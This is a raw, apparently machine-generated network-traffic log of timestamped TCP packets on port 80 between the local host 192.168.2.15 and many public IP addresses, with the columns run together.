                                                          Feb 4, 2025 18:11:15.303733110 CET1064380192.168.2.1547.16.79.146
                                                          Feb 4, 2025 18:11:15.303735971 CET1064380192.168.2.15147.135.13.65
                                                          Feb 4, 2025 18:11:15.303747892 CET1064380192.168.2.1548.255.204.204
                                                          Feb 4, 2025 18:11:15.303755999 CET1064380192.168.2.15122.136.92.153
                                                          Feb 4, 2025 18:11:15.303761959 CET1064380192.168.2.1544.20.179.154
                                                          Feb 4, 2025 18:11:15.303761959 CET1064380192.168.2.15135.107.24.174
                                                          Feb 4, 2025 18:11:15.303775072 CET1064380192.168.2.15204.198.178.35
                                                          Feb 4, 2025 18:11:15.303838015 CET1064380192.168.2.15202.238.19.187
                                                          Feb 4, 2025 18:11:15.303838968 CET1064380192.168.2.15182.102.83.40
                                                          Feb 4, 2025 18:11:15.303839922 CET1064380192.168.2.1577.117.28.234
                                                          Feb 4, 2025 18:11:15.303839922 CET1064380192.168.2.15191.148.205.84
                                                          Feb 4, 2025 18:11:15.303839922 CET1064380192.168.2.1550.86.134.145
                                                          Feb 4, 2025 18:11:15.303845882 CET1064380192.168.2.15181.155.216.13
                                                          Feb 4, 2025 18:11:15.303845882 CET1064380192.168.2.1582.37.254.31
                                                          Feb 4, 2025 18:11:15.303878069 CET1064380192.168.2.15139.55.131.10
                                                          Feb 4, 2025 18:11:15.303878069 CET1064380192.168.2.158.237.52.254
                                                          Feb 4, 2025 18:11:15.303878069 CET1064380192.168.2.15113.222.234.15
                                                          Feb 4, 2025 18:11:15.303880930 CET1064380192.168.2.15100.170.25.126
                                                          Feb 4, 2025 18:11:15.303894997 CET1064380192.168.2.1517.204.40.11
                                                          Feb 4, 2025 18:11:15.310075045 CET8010643177.82.8.49192.168.2.15
                                                          Feb 4, 2025 18:11:15.310086966 CET801064332.109.104.6192.168.2.15
                                                          Feb 4, 2025 18:11:15.310091019 CET8010643200.162.125.49192.168.2.15
                                                          Feb 4, 2025 18:11:15.310131073 CET1064380192.168.2.15177.82.8.49
                                                          Feb 4, 2025 18:11:15.310141087 CET1064380192.168.2.1532.109.104.6
                                                          Feb 4, 2025 18:11:15.310143948 CET1064380192.168.2.15200.162.125.49
                                                          Feb 4, 2025 18:11:15.310235023 CET801064319.119.179.107192.168.2.15
                                                          Feb 4, 2025 18:11:15.310244083 CET801064380.99.95.150192.168.2.15
                                                          Feb 4, 2025 18:11:15.310252905 CET8010643166.207.45.208192.168.2.15
                                                          Feb 4, 2025 18:11:15.310261011 CET80106439.119.226.185192.168.2.15
                                                          Feb 4, 2025 18:11:15.310270071 CET801064395.13.149.114192.168.2.15
                                                          Feb 4, 2025 18:11:15.310276985 CET1064380192.168.2.1519.119.179.107
                                                          Feb 4, 2025 18:11:15.310277939 CET1064380192.168.2.1580.99.95.150
                                                          Feb 4, 2025 18:11:15.310288906 CET1064380192.168.2.15166.207.45.208
                                                          Feb 4, 2025 18:11:15.310288906 CET1064380192.168.2.159.119.226.185
                                                          Feb 4, 2025 18:11:15.310292959 CET8010643188.5.23.207192.168.2.15
                                                          Feb 4, 2025 18:11:15.310302973 CET8010643106.129.170.230192.168.2.15
                                                          Feb 4, 2025 18:11:15.310311079 CET1064380192.168.2.1595.13.149.114
                                                          Feb 4, 2025 18:11:15.310312033 CET8010643181.156.61.20192.168.2.15
                                                          Feb 4, 2025 18:11:15.310326099 CET801064360.156.61.231192.168.2.15
                                                          Feb 4, 2025 18:11:15.310331106 CET1064380192.168.2.15106.129.170.230
                                                          Feb 4, 2025 18:11:15.310333014 CET1064380192.168.2.15188.5.23.207
                                                          Feb 4, 2025 18:11:15.310336113 CET8010643173.206.97.190192.168.2.15
                                                          Feb 4, 2025 18:11:15.310344934 CET8010643205.76.209.146192.168.2.15
                                                          Feb 4, 2025 18:11:15.310352087 CET1064380192.168.2.15181.156.61.20
                                                          Feb 4, 2025 18:11:15.310353994 CET801064312.97.179.162192.168.2.15
                                                          Feb 4, 2025 18:11:15.310355902 CET1064380192.168.2.1560.156.61.231
                                                          Feb 4, 2025 18:11:15.310363054 CET8010643164.65.137.10192.168.2.15
                                                          Feb 4, 2025 18:11:15.310373068 CET8010643109.194.126.187192.168.2.15
                                                          Feb 4, 2025 18:11:15.310380936 CET1064380192.168.2.15205.76.209.146
                                                          Feb 4, 2025 18:11:15.310383081 CET8010643200.233.41.109192.168.2.15
                                                          Feb 4, 2025 18:11:15.310384035 CET1064380192.168.2.15173.206.97.190
                                                          Feb 4, 2025 18:11:15.310395002 CET8010643183.129.252.65192.168.2.15
                                                          Feb 4, 2025 18:11:15.310404062 CET801064337.172.150.98192.168.2.15
                                                          Feb 4, 2025 18:11:15.310412884 CET8010643178.15.78.97192.168.2.15
                                                          Feb 4, 2025 18:11:15.310420990 CET8010643204.176.132.110192.168.2.15
                                                          Feb 4, 2025 18:11:15.310429096 CET8010643181.72.225.6192.168.2.15
                                                          Feb 4, 2025 18:11:15.310436010 CET1064380192.168.2.15164.65.137.10
                                                          Feb 4, 2025 18:11:15.310441017 CET1064380192.168.2.15200.233.41.109
                                                          Feb 4, 2025 18:11:15.310441971 CET1064380192.168.2.15178.15.78.97
                                                          Feb 4, 2025 18:11:15.310450077 CET1064380192.168.2.1537.172.150.98
                                                          Feb 4, 2025 18:11:15.310455084 CET1064380192.168.2.1512.97.179.162
                                                          Feb 4, 2025 18:11:15.310456038 CET1064380192.168.2.15181.72.225.6
                                                          Feb 4, 2025 18:11:15.310455084 CET1064380192.168.2.15204.176.132.110
                                                          Feb 4, 2025 18:11:15.310457945 CET801064368.142.23.3192.168.2.15
                                                          Feb 4, 2025 18:11:15.310456991 CET1064380192.168.2.15183.129.252.65
                                                          Feb 4, 2025 18:11:15.310463905 CET1064380192.168.2.15109.194.126.187
                                                          Feb 4, 2025 18:11:15.310467958 CET8010643146.232.250.211192.168.2.15
                                                          Feb 4, 2025 18:11:15.310477972 CET8010643126.88.175.215192.168.2.15
                                                          Feb 4, 2025 18:11:15.310489893 CET801064343.82.229.157192.168.2.15
                                                          Feb 4, 2025 18:11:15.310497999 CET1064380192.168.2.15146.232.250.211
                                                          Feb 4, 2025 18:11:15.310501099 CET1064380192.168.2.1568.142.23.3
                                                          Feb 4, 2025 18:11:15.310504913 CET801064366.135.17.87192.168.2.15
                                                          Feb 4, 2025 18:11:15.310514927 CET8010643194.111.48.242192.168.2.15
                                                          Feb 4, 2025 18:11:15.310525894 CET1064380192.168.2.15126.88.175.215
                                                          Feb 4, 2025 18:11:15.310525894 CET1064380192.168.2.1543.82.229.157
                                                          Feb 4, 2025 18:11:15.310542107 CET1064380192.168.2.1566.135.17.87
                                                          Feb 4, 2025 18:11:15.310545921 CET1064380192.168.2.15194.111.48.242
                                                          Feb 4, 2025 18:11:15.310677052 CET801064384.0.101.244192.168.2.15
                                                          Feb 4, 2025 18:11:15.310686111 CET801064383.61.136.91192.168.2.15
                                                          Feb 4, 2025 18:11:15.310694933 CET8010643126.70.32.90192.168.2.15
                                                          Feb 4, 2025 18:11:15.310698986 CET8010643108.107.221.111192.168.2.15
                                                          Feb 4, 2025 18:11:15.310708046 CET8010643125.44.204.231192.168.2.15
                                                          Feb 4, 2025 18:11:15.310715914 CET8010643107.55.187.174192.168.2.15
                                                          Feb 4, 2025 18:11:15.310725927 CET8010643108.8.212.184192.168.2.15
                                                          Feb 4, 2025 18:11:15.310733080 CET8010643206.18.177.12192.168.2.15
                                                          Feb 4, 2025 18:11:15.310740948 CET8010643189.156.186.99192.168.2.15
                                                          Feb 4, 2025 18:11:15.310749054 CET8010643187.255.144.171192.168.2.15
                                                          Feb 4, 2025 18:11:15.310756922 CET801064389.171.116.145192.168.2.15
                                                          Feb 4, 2025 18:11:15.310765982 CET1064380192.168.2.15206.18.177.12
                                                          Feb 4, 2025 18:11:15.310767889 CET1064380192.168.2.1583.61.136.91
                                                          Feb 4, 2025 18:11:15.310767889 CET1064380192.168.2.15126.70.32.90
                                                          Feb 4, 2025 18:11:15.310767889 CET1064380192.168.2.15125.44.204.231
                                                          Feb 4, 2025 18:11:15.310772896 CET80106438.96.135.15192.168.2.15
                                                          Feb 4, 2025 18:11:15.310770988 CET1064380192.168.2.15107.55.187.174
                                                          Feb 4, 2025 18:11:15.310769081 CET1064380192.168.2.1584.0.101.244
                                                          Feb 4, 2025 18:11:15.310770988 CET1064380192.168.2.15108.107.221.111
                                                          Feb 4, 2025 18:11:15.310775995 CET1064380192.168.2.15108.8.212.184
                                                          Feb 4, 2025 18:11:15.310784101 CET1064380192.168.2.15189.156.186.99
                                                          Feb 4, 2025 18:11:15.310784101 CET1064380192.168.2.1589.171.116.145
                                                          Feb 4, 2025 18:11:15.310786009 CET801064336.166.131.210192.168.2.15
                                                          Feb 4, 2025 18:11:15.310796022 CET1064380192.168.2.15187.255.144.171
                                                          Feb 4, 2025 18:11:15.310796022 CET801064378.254.237.99192.168.2.15
                                                          Feb 4, 2025 18:11:15.310806036 CET801064395.225.178.100192.168.2.15
                                                          Feb 4, 2025 18:11:15.310806036 CET1064380192.168.2.158.96.135.15
                                                          Feb 4, 2025 18:11:15.310815096 CET8010643200.22.208.167192.168.2.15
                                                          Feb 4, 2025 18:11:15.310823917 CET801064341.137.229.247192.168.2.15
                                                          Feb 4, 2025 18:11:15.310827971 CET8010643207.26.197.36192.168.2.15
                                                          Feb 4, 2025 18:11:15.310832024 CET8010643114.198.115.177192.168.2.15
                                                          Feb 4, 2025 18:11:15.310842991 CET1064380192.168.2.1578.254.237.99
                                                          Feb 4, 2025 18:11:15.310846090 CET1064380192.168.2.1536.166.131.210
                                                          Feb 4, 2025 18:11:15.310848951 CET1064380192.168.2.1595.225.178.100
                                                          Feb 4, 2025 18:11:15.310858965 CET1064380192.168.2.1541.137.229.247
                                                          Feb 4, 2025 18:11:15.310862064 CET8010643175.253.12.68192.168.2.15
                                                          Feb 4, 2025 18:11:15.310873032 CET8010643132.130.80.183192.168.2.15
                                                          Feb 4, 2025 18:11:15.310882092 CET801064367.76.177.112192.168.2.15
                                                          Feb 4, 2025 18:11:15.310890913 CET801064384.59.111.135192.168.2.15
                                                          Feb 4, 2025 18:11:15.310890913 CET1064380192.168.2.15200.22.208.167
                                                          Feb 4, 2025 18:11:15.310892105 CET1064380192.168.2.15175.253.12.68
                                                          Feb 4, 2025 18:11:15.310893059 CET1064380192.168.2.15207.26.197.36
                                                          Feb 4, 2025 18:11:15.310899019 CET1064380192.168.2.15114.198.115.177
                                                          Feb 4, 2025 18:11:15.310899973 CET1064380192.168.2.15132.130.80.183
                                                          Feb 4, 2025 18:11:15.310910940 CET801064382.32.93.110192.168.2.15
                                                          Feb 4, 2025 18:11:15.310920000 CET801064340.27.177.94192.168.2.15
                                                          Feb 4, 2025 18:11:15.310928106 CET8010643143.23.249.38192.168.2.15
                                                          Feb 4, 2025 18:11:15.310935974 CET1064380192.168.2.1567.76.177.112
                                                          Feb 4, 2025 18:11:15.310944080 CET8010643194.35.89.86192.168.2.15
                                                          Feb 4, 2025 18:11:15.310945988 CET1064380192.168.2.1582.32.93.110
                                                          Feb 4, 2025 18:11:15.310946941 CET1064380192.168.2.1540.27.177.94
                                                          Feb 4, 2025 18:11:15.310954094 CET8010643141.119.124.169192.168.2.15
                                                          Feb 4, 2025 18:11:15.310975075 CET1064380192.168.2.1584.59.111.135
                                                          Feb 4, 2025 18:11:15.310975075 CET1064380192.168.2.15143.23.249.38
                                                          Feb 4, 2025 18:11:15.310975075 CET1064380192.168.2.15141.119.124.169
                                                          Feb 4, 2025 18:11:15.310987949 CET1064380192.168.2.15194.35.89.86
                                                          Feb 4, 2025 18:11:15.311192989 CET801064340.164.113.19192.168.2.15
                                                          Feb 4, 2025 18:11:15.311203003 CET8010643190.51.84.210192.168.2.15
                                                          Feb 4, 2025 18:11:15.311211109 CET8010643176.70.45.40192.168.2.15
                                                          Feb 4, 2025 18:11:15.311218977 CET8010643200.16.27.139192.168.2.15
                                                          Feb 4, 2025 18:11:15.311228991 CET8010643178.24.117.67192.168.2.15
                                                          Feb 4, 2025 18:11:15.311233997 CET1064380192.168.2.15190.51.84.210
                                                          Feb 4, 2025 18:11:15.311237097 CET1064380192.168.2.1540.164.113.19
                                                          Feb 4, 2025 18:11:15.311245918 CET801064327.92.164.132192.168.2.15
                                                          Feb 4, 2025 18:11:15.311254978 CET801064375.202.255.136192.168.2.15
                                                          Feb 4, 2025 18:11:15.311263084 CET1064380192.168.2.15200.16.27.139
                                                          Feb 4, 2025 18:11:15.311265945 CET1064380192.168.2.15176.70.45.40
                                                          Feb 4, 2025 18:11:15.311265945 CET1064380192.168.2.15178.24.117.67
                                                          Feb 4, 2025 18:11:15.311270952 CET8010643150.249.4.56192.168.2.15
                                                          Feb 4, 2025 18:11:15.311280012 CET1064380192.168.2.1527.92.164.132
                                                          Feb 4, 2025 18:11:15.311280966 CET8010643139.62.254.107192.168.2.15
                                                          Feb 4, 2025 18:11:15.311290979 CET801064313.108.32.211192.168.2.15
                                                          Feb 4, 2025 18:11:15.311300039 CET801064332.71.11.101192.168.2.15
                                                          Feb 4, 2025 18:11:15.311307907 CET801064312.84.237.46192.168.2.15
                                                          Feb 4, 2025 18:11:15.311323881 CET1064380192.168.2.1575.202.255.136
                                                          Feb 4, 2025 18:11:15.311325073 CET1064380192.168.2.1513.108.32.211
                                                          Feb 4, 2025 18:11:15.311323881 CET1064380192.168.2.15139.62.254.107
                                                          Feb 4, 2025 18:11:15.311326027 CET1064380192.168.2.15150.249.4.56
                                                          Feb 4, 2025 18:11:15.311342001 CET801064362.209.59.232192.168.2.15
                                                          Feb 4, 2025 18:11:15.311343908 CET1064380192.168.2.1532.71.11.101
                                                          Feb 4, 2025 18:11:15.311347961 CET1064380192.168.2.1512.84.237.46
                                                          Feb 4, 2025 18:11:15.311356068 CET8010643159.222.186.124192.168.2.15
                                                          Feb 4, 2025 18:11:15.311367989 CET8010643139.0.119.230192.168.2.15
                                                          Feb 4, 2025 18:11:15.311377048 CET8010643124.18.92.244192.168.2.15
                                                          Feb 4, 2025 18:11:15.311384916 CET8010643115.185.195.251192.168.2.15
                                                          Feb 4, 2025 18:11:15.311392069 CET801064335.149.142.163192.168.2.15
                                                          Feb 4, 2025 18:11:15.311398029 CET1064380192.168.2.15139.0.119.230
                                                          Feb 4, 2025 18:11:15.311398983 CET1064380192.168.2.15159.222.186.124
                                                          Feb 4, 2025 18:11:15.311400890 CET801064342.77.12.95192.168.2.15
                                                          Feb 4, 2025 18:11:15.311402082 CET1064380192.168.2.1562.209.59.232
                                                          Feb 4, 2025 18:11:15.311408997 CET1064380192.168.2.15124.18.92.244
                                                          Feb 4, 2025 18:11:15.311409950 CET8010643151.135.231.28192.168.2.15
                                                          Feb 4, 2025 18:11:15.311415911 CET1064380192.168.2.15115.185.195.251
                                                          Feb 4, 2025 18:11:15.311419964 CET8010643219.26.94.243192.168.2.15
                                                          Feb 4, 2025 18:11:15.311429977 CET8010643151.84.254.55192.168.2.15
                                                          Feb 4, 2025 18:11:15.311439037 CET801064368.2.40.103192.168.2.15
                                                          Feb 4, 2025 18:11:15.311448097 CET801064376.247.142.44192.168.2.15
                                                          Feb 4, 2025 18:11:15.311456919 CET801064368.223.197.207192.168.2.15
                                                          Feb 4, 2025 18:11:15.311460018 CET1064380192.168.2.1535.149.142.163
                                                          Feb 4, 2025 18:11:15.311461926 CET1064380192.168.2.1542.77.12.95
                                                          Feb 4, 2025 18:11:15.311464071 CET1064380192.168.2.15151.84.254.55
                                                          Feb 4, 2025 18:11:15.311466932 CET1064380192.168.2.1568.2.40.103
                                                          Feb 4, 2025 18:11:15.311470032 CET1064380192.168.2.15151.135.231.28
                                                          Feb 4, 2025 18:11:15.311471939 CET8010643203.195.122.98192.168.2.15
                                                          Feb 4, 2025 18:11:15.311476946 CET1064380192.168.2.15219.26.94.243
                                                          Feb 4, 2025 18:11:15.311481953 CET801064317.53.64.207192.168.2.15
                                                          Feb 4, 2025 18:11:15.311486006 CET1064380192.168.2.1576.247.142.44
                                                          Feb 4, 2025 18:11:15.311491013 CET1064380192.168.2.1568.223.197.207
                                                          Feb 4, 2025 18:11:15.311492920 CET801064358.119.47.250192.168.2.15
                                                          Feb 4, 2025 18:11:15.311508894 CET1064380192.168.2.15203.195.122.98
                                                          Feb 4, 2025 18:11:15.311568022 CET1064380192.168.2.1517.53.64.207
                                                          Feb 4, 2025 18:11:15.311578989 CET1064380192.168.2.1558.119.47.250
                                                          Feb 4, 2025 18:11:15.311779976 CET8010643129.122.69.84192.168.2.15
                                                          Feb 4, 2025 18:11:15.311789036 CET8010643204.195.131.15192.168.2.15
                                                          Feb 4, 2025 18:11:15.311800003 CET8010643216.239.162.11192.168.2.15
                                                          Feb 4, 2025 18:11:15.311808109 CET8010643104.108.17.71192.168.2.15
                                                          Feb 4, 2025 18:11:15.311815977 CET8010643140.115.164.99192.168.2.15
                                                          Feb 4, 2025 18:11:15.311825037 CET801064359.153.46.112192.168.2.15
                                                          Feb 4, 2025 18:11:15.311836004 CET801064396.93.172.124192.168.2.15
                                                          Feb 4, 2025 18:11:15.311855078 CET1064380192.168.2.15104.108.17.71
                                                          Feb 4, 2025 18:11:15.311856031 CET1064380192.168.2.15216.239.162.11
                                                          Feb 4, 2025 18:11:15.311861038 CET1064380192.168.2.15140.115.164.99
                                                          Feb 4, 2025 18:11:15.311863899 CET1064380192.168.2.15129.122.69.84
                                                          Feb 4, 2025 18:11:15.311863899 CET1064380192.168.2.15204.195.131.15
                                                          Feb 4, 2025 18:11:15.311863899 CET1064380192.168.2.1559.153.46.112
                                                          Feb 4, 2025 18:11:15.311863899 CET1064380192.168.2.1596.93.172.124
                                                          Feb 4, 2025 18:11:15.311984062 CET8010643213.60.47.102192.168.2.15
                                                          Feb 4, 2025 18:11:15.311995029 CET801064370.84.204.19192.168.2.15
                                                          Feb 4, 2025 18:11:15.312001944 CET801064325.237.15.163192.168.2.15
                                                          Feb 4, 2025 18:11:15.312010050 CET8010643218.209.237.53192.168.2.15
                                                          Feb 4, 2025 18:11:15.312017918 CET8010643159.187.251.131192.168.2.15
                                                          Feb 4, 2025 18:11:15.312027931 CET1064380192.168.2.15213.60.47.102
                                                          Feb 4, 2025 18:11:15.312027931 CET1064380192.168.2.1525.237.15.163
                                                          Feb 4, 2025 18:11:15.312028885 CET1064380192.168.2.1570.84.204.19
                                                          Feb 4, 2025 18:11:15.312038898 CET801064361.237.9.180192.168.2.15
                                                          Feb 4, 2025 18:11:15.312037945 CET1064380192.168.2.15218.209.237.53
                                                          Feb 4, 2025 18:11:15.312047958 CET8010643134.102.52.20192.168.2.15
                                                          Feb 4, 2025 18:11:15.312055111 CET1064380192.168.2.15159.187.251.131
                                                          Feb 4, 2025 18:11:15.312062025 CET801064362.152.196.59192.168.2.15
                                                          Feb 4, 2025 18:11:15.312071085 CET801064370.218.234.158192.168.2.15
                                                          Feb 4, 2025 18:11:15.312078953 CET8010643163.191.21.183192.168.2.15
                                                          Feb 4, 2025 18:11:15.312079906 CET1064380192.168.2.15134.102.52.20
                                                          Feb 4, 2025 18:11:15.312079906 CET1064380192.168.2.1561.237.9.180
                                                          Feb 4, 2025 18:11:15.312086105 CET801064359.197.123.191192.168.2.15
                                                          Feb 4, 2025 18:11:15.312094927 CET801064335.94.114.161192.168.2.15
                                                          Feb 4, 2025 18:11:15.312097073 CET1064380192.168.2.1562.152.196.59
                                                          Feb 4, 2025 18:11:15.312103033 CET801064374.163.151.103192.168.2.15
                                                          Feb 4, 2025 18:11:15.312108994 CET1064380192.168.2.1559.197.123.191
                                                          Feb 4, 2025 18:11:15.312114000 CET1064380192.168.2.1570.218.234.158
                                                          Feb 4, 2025 18:11:15.312115908 CET801064344.56.110.156192.168.2.15
                                                          Feb 4, 2025 18:11:15.312125921 CET801064387.159.213.41192.168.2.15
                                                          Feb 4, 2025 18:11:15.312134027 CET801064379.68.93.23192.168.2.15
                                                          Feb 4, 2025 18:11:15.312138081 CET8010643122.230.149.114192.168.2.15
                                                          Feb 4, 2025 18:11:15.312148094 CET8010643186.116.115.17192.168.2.15
                                                          Feb 4, 2025 18:11:15.312156916 CET8010643173.182.50.119192.168.2.15
                                                          Feb 4, 2025 18:11:15.312165022 CET8010643204.180.52.55192.168.2.15
                                                          Feb 4, 2025 18:11:15.312165022 CET1064380192.168.2.1535.94.114.161
                                                          Feb 4, 2025 18:11:15.312166929 CET1064380192.168.2.15163.191.21.183
                                                          Feb 4, 2025 18:11:15.312166929 CET1064380192.168.2.1587.159.213.41
                                                          Feb 4, 2025 18:11:15.312174082 CET8010643216.213.46.231192.168.2.15
                                                          Feb 4, 2025 18:11:15.312185049 CET1064380192.168.2.1574.163.151.103
                                                          Feb 4, 2025 18:11:15.312185049 CET1064380192.168.2.1579.68.93.23
                                                          Feb 4, 2025 18:11:15.312190056 CET1064380192.168.2.15122.230.149.114
                                                          Feb 4, 2025 18:11:15.312190056 CET1064380192.168.2.1544.56.110.156
                                                          Feb 4, 2025 18:11:15.312196970 CET1064380192.168.2.15173.182.50.119
                                                          Feb 4, 2025 18:11:15.312205076 CET1064380192.168.2.15204.180.52.55
                                                          Feb 4, 2025 18:11:15.312208891 CET1064380192.168.2.15186.116.115.17
                                                          Feb 4, 2025 18:11:15.312212944 CET1064380192.168.2.15216.213.46.231
                                                          Feb 4, 2025 18:11:15.312561035 CET801064367.218.78.191192.168.2.15
                                                          Feb 4, 2025 18:11:15.312571049 CET8010643180.247.222.119192.168.2.15
                                                          Feb 4, 2025 18:11:15.312578917 CET8010643126.182.35.205192.168.2.15
                                                          Feb 4, 2025 18:11:15.312587976 CET8010643148.124.95.174192.168.2.15
                                                          Feb 4, 2025 18:11:15.312591076 CET801064340.223.8.205192.168.2.15
                                                          Feb 4, 2025 18:11:15.312602997 CET8010643212.81.176.109192.168.2.15
                                                          Feb 4, 2025 18:11:15.312604904 CET1064380192.168.2.1567.218.78.191
                                                          Feb 4, 2025 18:11:15.312611103 CET8010643192.28.191.237192.168.2.15
                                                          Feb 4, 2025 18:11:15.312618971 CET8010643128.144.240.143192.168.2.15
                                                          Feb 4, 2025 18:11:15.312625885 CET8010643166.138.238.35192.168.2.15
                                                          Feb 4, 2025 18:11:15.312633991 CET1064380192.168.2.15180.247.222.119
                                                          Feb 4, 2025 18:11:15.312634945 CET8010643198.160.236.62192.168.2.15
                                                          Feb 4, 2025 18:11:15.312634945 CET1064380192.168.2.15148.124.95.174
                                                          Feb 4, 2025 18:11:15.312643051 CET1064380192.168.2.15126.182.35.205
                                                          Feb 4, 2025 18:11:15.312647104 CET1064380192.168.2.1540.223.8.205
                                                          Feb 4, 2025 18:11:15.312647104 CET1064380192.168.2.15128.144.240.143
                                                          Feb 4, 2025 18:11:15.312650919 CET1064380192.168.2.15166.138.238.35
                                                          Feb 4, 2025 18:11:15.312658072 CET8010643107.223.216.240192.168.2.15
                                                          Feb 4, 2025 18:11:15.312659979 CET1064380192.168.2.15212.81.176.109
                                                          Feb 4, 2025 18:11:15.312659979 CET1064380192.168.2.15192.28.191.237
                                                          Feb 4, 2025 18:11:15.312679052 CET8010643168.68.13.8192.168.2.15
                                                          Feb 4, 2025 18:11:15.312683105 CET1064380192.168.2.15198.160.236.62
                                                          Feb 4, 2025 18:11:15.312685013 CET1064380192.168.2.15107.223.216.240
                                                          Feb 4, 2025 18:11:15.312688112 CET8010643116.7.76.23192.168.2.15
                                                          Feb 4, 2025 18:11:15.312695980 CET8010643206.199.245.36192.168.2.15
                                                          Feb 4, 2025 18:11:15.312700033 CET801064357.100.84.199192.168.2.15
                                                          Feb 4, 2025 18:11:15.312702894 CET8010643134.62.75.223192.168.2.15
                                                          Feb 4, 2025 18:11:15.312711954 CET801064319.144.149.113192.168.2.15
                                                          Feb 4, 2025 18:11:15.312715054 CET8010643126.143.12.162192.168.2.15
                                                          Feb 4, 2025 18:11:15.312724113 CET801064398.185.1.120192.168.2.15
                                                          Feb 4, 2025 18:11:15.312725067 CET1064380192.168.2.15168.68.13.8
                                                          Feb 4, 2025 18:11:15.312732935 CET80106434.252.219.51192.168.2.15
                                                          Feb 4, 2025 18:11:15.312743902 CET8010643171.125.195.174192.168.2.15
                                                          Feb 4, 2025 18:11:15.312746048 CET1064380192.168.2.15126.143.12.162
                                                          Feb 4, 2025 18:11:15.312748909 CET1064380192.168.2.15134.62.75.223
                                                          Feb 4, 2025 18:11:15.312748909 CET1064380192.168.2.1557.100.84.199
                                                          Feb 4, 2025 18:11:15.312753916 CET8010643179.62.125.110192.168.2.15
                                                          Feb 4, 2025 18:11:15.312762976 CET801064334.27.137.224192.168.2.15
                                                          Feb 4, 2025 18:11:15.312779903 CET80106432.51.215.69192.168.2.15
                                                          Feb 4, 2025 18:11:15.312782049 CET1064380192.168.2.15116.7.76.23
                                                          Feb 4, 2025 18:11:15.312783003 CET1064380192.168.2.15206.199.245.36
                                                          Feb 4, 2025 18:11:15.312783957 CET1064380192.168.2.1519.144.149.113
                                                          Feb 4, 2025 18:11:15.312791109 CET801064341.15.181.215192.168.2.15
                                                          Feb 4, 2025 18:11:15.312794924 CET1064380192.168.2.1598.185.1.120
                                                          Feb 4, 2025 18:11:15.312798977 CET1064380192.168.2.15179.62.125.110
                                                          Feb 4, 2025 18:11:15.312798977 CET1064380192.168.2.154.252.219.51
                                                          Feb 4, 2025 18:11:15.312798977 CET1064380192.168.2.15171.125.195.174
                                                          Feb 4, 2025 18:11:15.312803030 CET8010643150.170.24.90192.168.2.15
                                                          Feb 4, 2025 18:11:15.312812090 CET1064380192.168.2.1534.27.137.224
                                                          Feb 4, 2025 18:11:15.312812090 CET1064380192.168.2.152.51.215.69
                                                          Feb 4, 2025 18:11:15.312812090 CET1064380192.168.2.1541.15.181.215
                                                          Feb 4, 2025 18:11:15.312827110 CET8010643124.184.212.227192.168.2.15
                                                          Feb 4, 2025 18:11:15.312835932 CET801064319.122.225.91192.168.2.15
                                                          Feb 4, 2025 18:11:15.312844038 CET1064380192.168.2.15150.170.24.90
                                                          Feb 4, 2025 18:11:15.312859058 CET1064380192.168.2.15124.184.212.227
                                                          Feb 4, 2025 18:11:15.312899113 CET1064380192.168.2.1519.122.225.91
                                                          Feb 4, 2025 18:11:15.313057899 CET801064340.54.178.141192.168.2.15
                                                          Feb 4, 2025 18:11:15.313067913 CET801064393.55.208.184192.168.2.15
                                                          Feb 4, 2025 18:11:15.313076019 CET8010643108.82.109.60192.168.2.15
                                                          Feb 4, 2025 18:11:15.313083887 CET8010643218.1.155.194192.168.2.15
                                                          Feb 4, 2025 18:11:15.313092947 CET801064336.252.80.237192.168.2.15
                                                          Feb 4, 2025 18:11:15.313095093 CET1064380192.168.2.1593.55.208.184
                                                          Feb 4, 2025 18:11:15.313102007 CET8010643187.83.13.240192.168.2.15
                                                          Feb 4, 2025 18:11:15.313103914 CET1064380192.168.2.1540.54.178.141
                                                          Feb 4, 2025 18:11:15.313106060 CET1064380192.168.2.15108.82.109.60
                                                          Feb 4, 2025 18:11:15.313111067 CET8010643221.196.89.137192.168.2.15
                                                          Feb 4, 2025 18:11:15.313112974 CET1064380192.168.2.15218.1.155.194
                                                          Feb 4, 2025 18:11:15.313119888 CET8010643190.41.13.234192.168.2.15
                                                          Feb 4, 2025 18:11:15.313127995 CET1064380192.168.2.1536.252.80.237
                                                          Feb 4, 2025 18:11:15.313129902 CET8010643160.150.111.91192.168.2.15
                                                          Feb 4, 2025 18:11:15.313143015 CET8010643192.98.224.222192.168.2.15
                                                          Feb 4, 2025 18:11:15.313146114 CET1064380192.168.2.15187.83.13.240
                                                          Feb 4, 2025 18:11:15.313153028 CET1064380192.168.2.15221.196.89.137
                                                          Feb 4, 2025 18:11:15.313153982 CET8010643107.29.41.254192.168.2.15
                                                          Feb 4, 2025 18:11:15.313163996 CET1064380192.168.2.15190.41.13.234
                                                          Feb 4, 2025 18:11:15.313165903 CET1064380192.168.2.15160.150.111.91
                                                          Feb 4, 2025 18:11:15.313172102 CET8010643126.202.227.97192.168.2.15
                                                          Feb 4, 2025 18:11:15.313180923 CET801064358.183.107.172192.168.2.15
                                                          Feb 4, 2025 18:11:15.313183069 CET1064380192.168.2.15192.98.224.222
                                                          Feb 4, 2025 18:11:15.313189983 CET8010643208.4.81.60192.168.2.15
                                                          Feb 4, 2025 18:11:15.313194990 CET1064380192.168.2.15107.29.41.254
                                                          Feb 4, 2025 18:11:15.313199997 CET8010643149.193.216.45192.168.2.15
                                                          Feb 4, 2025 18:11:15.313209057 CET8010643120.102.157.63192.168.2.15
                                                          Feb 4, 2025 18:11:15.313213110 CET1064380192.168.2.1558.183.107.172
                                                          Feb 4, 2025 18:11:15.313218117 CET1064380192.168.2.15126.202.227.97
                                                          Feb 4, 2025 18:11:15.313220978 CET1064380192.168.2.15208.4.81.60
                                                          Feb 4, 2025 18:11:15.313226938 CET8010643188.184.250.208192.168.2.15
                                                          Feb 4, 2025 18:11:15.313229084 CET1064380192.168.2.15149.193.216.45
                                                          Feb 4, 2025 18:11:15.313235998 CET8010643216.132.235.198192.168.2.15
                                                          Feb 4, 2025 18:11:15.313240051 CET8010643177.95.53.134192.168.2.15
                                                          Feb 4, 2025 18:11:15.313247919 CET1064380192.168.2.15120.102.157.63
                                                          Feb 4, 2025 18:11:15.313255072 CET8010643197.212.80.99192.168.2.15
                                                          Feb 4, 2025 18:11:15.313265085 CET801064393.205.216.61192.168.2.15
                                                          Feb 4, 2025 18:11:15.313272953 CET801064314.42.26.251192.168.2.15
                                                          Feb 4, 2025 18:11:15.313272953 CET1064380192.168.2.15177.95.53.134
                                                          Feb 4, 2025 18:11:15.313272953 CET1064380192.168.2.15216.132.235.198
                                                          Feb 4, 2025 18:11:15.313275099 CET1064380192.168.2.15188.184.250.208
